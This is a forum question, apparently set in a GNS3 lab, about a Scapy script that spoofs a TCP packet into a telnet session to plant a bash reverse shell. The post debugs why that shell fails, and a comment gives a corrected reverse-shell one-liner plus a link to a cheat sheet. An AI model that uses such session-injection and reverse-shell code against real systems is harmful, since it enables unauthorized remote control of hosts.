# Can't make a reverse shell in GNS3

Tags: python, linux, ubuntu, security

I've tried to use GNS3 in Ubuntu. Here's the code:

```
import sys
from scapy.all import *
IPLayer = IP(src="10.10.10.191", dst="10.10.10.193")
TCPLayer = TCP(sport=46716, dport=23, flags="A",
seq=956606610, ack=3791760010)
Data = "\r /bin/bash -i > /dev/tcp/10.10.10.186/9090 2>&1 0<&1 \r"
pkt = IPLayer/TCPLayer/Data
ls(pkt)
send(pkt,verbose=0)
```

And I'm pretty sure the ip addresses are all right. But the distination server just sent me back an error message:"bash: /dev/tcp/10.10.10.186/9090: No such file or directory".
I have searched a lot but seems none of them met this error. How do I solve it?

Comment: it's surely just a one liner issue, try adding an ampersand like this : `/bin/bash -i >& /dev/tcp/10.10.10.186/9090 2>&1 0<&1` or check out payloadallthings https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#bash-tcp

Comment: Thank you but I think it's not the main problem. It still doesn't work.